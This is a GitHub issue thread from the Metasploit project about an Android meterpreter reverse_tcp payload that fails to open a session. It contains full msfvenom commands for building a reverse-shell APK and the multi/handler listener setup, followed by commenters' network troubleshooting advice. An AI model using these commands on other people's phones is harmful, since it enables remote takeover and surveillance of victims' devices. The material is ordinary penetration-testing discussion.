### ISSUE TITLE
No session opened , Keeps constant on ( Started reverse TCP handler on 192.168.x.xx:4444)

### ISSUE THREAD

**Issue by mazen-kh** [rapid7/metasploit-framework#12466]
### Important Notes

1- The goal is to penetration test on the victim's Android phone via payload

2- Victim's phone = Is my phone (I'm testing myself)

3- I use port 4444 

![Capture](https://user-images.githubusercontent.com/56686060/67022488-9646e280-f101-11e9-83ce-529536904bea.PNG)

4- Network adapter settings
![Capture3](https://user-images.githubusercontent.com/56686060/67023264-d22e7780-f102-11e9-8cee-354044ed48c1.PNG)
 
### The process and the steps I did:

1- **Create a payload via the following command:**
`msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.xx LPORT=4444 R> /root/Desktop/(name).apk`

I get LHOST from` ifconfig` to get the **internal ip**
![Capture2](https://user-images.githubusercontent.com/56686060/67023331-ec685580-f102-11e9-8eb8-c6b87e783b01.PNG)

2- **The result of creating a payload:**

```
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.xx LPORT=4444 R> /root/Desktop/name.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10085 bytes
```
**3- Open Metasploit-framework**

`msfconsole`

**4- Preparing the listener**

```
                      Metasploit

       =[ metasploit v5.0.53-dev                          ]
+ -- --=[ 1931 exploits - 1076 auxiliary - 331 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.x.xx
LHOST => 192.168.x.xx
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.x.xx:4444
```
**5- Transporting, installing and opening the load on the victim's phone (my phone)**

> The Problem :👇👇👇

**6- Nothing happens in the Metasploit, no session is shown and no session is opened and no error appears:**
```
Metasploit

       =[ metasploit v5.0.53-dev                          ]
+ -- --=[ 1931 exploits - 1076 auxiliary - 331 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.x.xx
LHOST => 192.168.x.xx
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.x.xx:4444 


```
**OS :** 
Kali-linux (VMware)
Windows 10 (Host)

I think the problem is related to ip 
but I'm not sure

Please Help

**Comment by theblackattacker** [comment]
open port in VMWARE for ur ip 
check ur again gufw ports and make sure ur gufw is disable
ports 
4444 UDP
4444 BOTH
try again

**Comment by abduls234** [comment]
smae problem please help me.. !!!
i have vmware workstation 15 player

**Comment by saroseo** [comment]
i have same problem
please help

**Comment by rvuttham06** [comment]
How about if its in Oracle Virtual Box? 

Same process should be followed? 

Thank You.

**Comment by jayakumar23** [comment]
Same problem help me

**Comment by KaliPro999** [comment]
@mazen-kh 
Well U were right!!!!
The problem is related to ur IP addr as to what I think.
LOOK!!:
`root@kali~# ifconfig
eth0: Blah...Blah...Blah...Blah....Blah...Blah...Blah...Blah....
         Blah...Blah...Blah...Blah....Blah...Blah...Blah...Blah....
         Blah...Blah...Blah...Blah....Blah...Blah...Blah...Blah....

lo: Blah...Blah...Blah...Blah....Blah...Blah...Blah...Blah....
     Blah...Blah...Blah...Blah....Blah...Blah...Blah...Blah....
     Blah...Blah...Blah...Blah....Blah...Blah...Blah...Blah....`

**UR ANSWER COMES NOW **

wlan0/wifi0: flags->blah........................blah....................
                    inet 192.168.XX.XXX (*This IP address*) Blah...
                   Blah...Blah...Blah...Blah...Blah...Blah...Blah...

The End!!!!!

**Comment by rvuttham06** [comment]
Hey, do we need the wifi adapter as it required when using kali linux in VM
or VB?

**Comment by bcoles** [comment]
> How about if its in Oracle Virtual Box?

9 times out of 10 this question is raised due to a fundamental misunderstanding of network routing. The path to enlightenment begins with troubleshooting your network configuration. netcat will serve you well.

> Hey, do we need the wifi adapter as it required when using kali linux in VM or VB?

The sole purpose of a wireless network adapter is to interact with wireless radio, usually for the purpose of connecting to a wireless network. Kali Linux does not require a wireless adapter unless you wish to interact with wireless networks, in which case, yes, you will require a wireless network adapter.

Also, this thread was closed over a year ago.

Also, the Metasploit issue tracker is for tracking issues with Metasploit.

Perhaps someone on IRC or Slack can help you out with your questions:

* https://www.metasploit.com/help
